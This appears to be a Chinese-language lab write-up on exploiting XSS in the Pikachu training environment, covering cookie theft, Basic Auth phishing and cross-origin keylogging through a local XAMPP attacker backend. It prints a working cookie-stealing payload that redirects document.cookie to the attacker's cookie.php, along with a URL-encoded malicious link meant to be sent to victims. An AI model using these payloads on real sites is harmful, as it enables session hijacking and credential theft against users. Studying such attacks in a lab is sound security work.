基于 Pikachu 环境演示 XSS 漏洞利用,涵盖 GET 和 POST 方式的 Cookie 窃取、钓鱼页面构造以及跨域键盘记录技术。通过配置本地 XAMPP 环境搭建攻击后台,使用 document.location 重定向及 Basic Auth 验证欺骗等具体 Payload 实现方法,展示了攻击者如何获取用户敏感信息及键盘输入。
实验环境
攻击流程
修改 C:\xampp\htdocs\pkxss\xcookie 下的 cookie.php,将 IP 地址改为漏洞服务器的地址。注意:因为 XSS 后台可以单独运行,所以将 pkxss 后台文件从 Pikachu 文件拿出来放在同一目录下。
注意: 由于把 pkxss 文件从 Pikachu 拿出来,如果从 Pikachu 平台进入 XSS 平台不会成功。此时想进入 XSS 后台只需要在浏览器输入 http://127.0.0.1:88/pkxss/index.php。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
准备一段 JS 代码,通过 document.location 实例进行重定向,访问 http://127.0.0.1:88/pkxss/xcookie/cookie.php 的后台页面,并通过 document.cookie 将本地 Cookie 的值带过去。
打开 Pikachu 平台的反射型 XSS (GET),输入 payload:
document.location='http://127.0.0.1:88/pkxss/xcookie/cookie.php?cookie='+document.cookie;
(输入之前要修改长度限制)
当用户提交的时候,就能取得用户的 Cookie。提交过后页面刷新到 Pikachu 的页面,达到预期效果。
在实际场景中,可以将以下 URL 发送给用户,一旦他访问该链接,便会获得他的 Cookie 值:
http://127.0.0.1:88/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F127.0.0.1%3A88%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit
图中第二个就是别人访问时我们获取的 Cookie。
基本原理
实验之前需要将 C:\xampp\htdocs\pkxss\xcookie 的 post.html 数据进行相应的 ID 更改,这两个地址分别是漏洞服务器和攻击者的服务器地址。
这时候不能直接把恶意代码嵌入到 URL 中。只需要诱导受害者点击 http://127.0.0.1:88/pkxss/xcookie/post.html 链接就能窃取用户的 Cookie。
思路:构造一个 payload 嵌入到网页中,让用户每次访问这个页面时都会执行我们的 payload。
我的 payload 是访问 fish.php 文件。fish.php 文件内容如下:
fish 文件做的事情是:判断用户是否输入了账号和密码,缺一不可。如果没有则弹出一个 Basic 验证。
当输入账号和密码的时候,它就会带着账号和密码访问另一个文件(网页),这个文件就是 xfish.php。
xfish 文件如下:
作用是把传来的账号和密码上传到攻击者的数据库中。
如果你在 Basic 验证框中输入了账号和密码,如图:
则攻击者的数据库中会存有输入的账号和密码。
在实验前,先了解什么是跨域。
为什么要有同源策略? 设置同源策略的主要目的是为了安全。如果没有同源限制,在浏览器中的 Cookie 等其他数据可以任意读取,不同域下的 DOM 任意操作,Ajax 任意请求其他网站的数据,包括隐私数据。
开始操作
127.0.0.1:88/pkxss/rkeypress/rkserver.php 是攻击者自己搭建的,攻击者可以允许所有的人跨域请求它):
以上即为基于本地环境的 XSS 常见攻击方式模拟实验。